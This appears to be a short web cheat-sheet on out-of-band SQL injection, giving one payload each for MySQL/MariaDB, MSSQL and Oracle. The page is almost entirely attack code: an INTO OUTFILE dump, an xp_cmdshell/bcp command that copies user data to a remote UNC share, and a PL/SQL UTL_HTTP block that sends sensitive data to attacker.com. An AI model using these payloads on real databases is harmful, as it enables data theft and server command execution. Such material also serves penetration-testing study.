Skip to content

SQL Injection

Out-of-band Injection

MySQL and MariaDB

SELECT sensitive_data FROM users INTO OUTFILE '/tmp/out.txt';

Microsoft SQL Server (MSSQL)

EXEC xp_cmdshell 'bcp "SELECT sensitive_data FROM users" queryout "\\10.10.58.187\logs\out.txt" -c -T';

Oracle

DECLARE
  req UTL_HTTP.REQ;
  resp UTL_HTTP.RESP;
BEGIN
  req := UTL_HTTP.BEGIN_REQUEST('http://attacker.com/exfiltrate?sensitive_data=' || sensitive_data);
  UTL_HTTP.GET_RESPONSE(req);
END;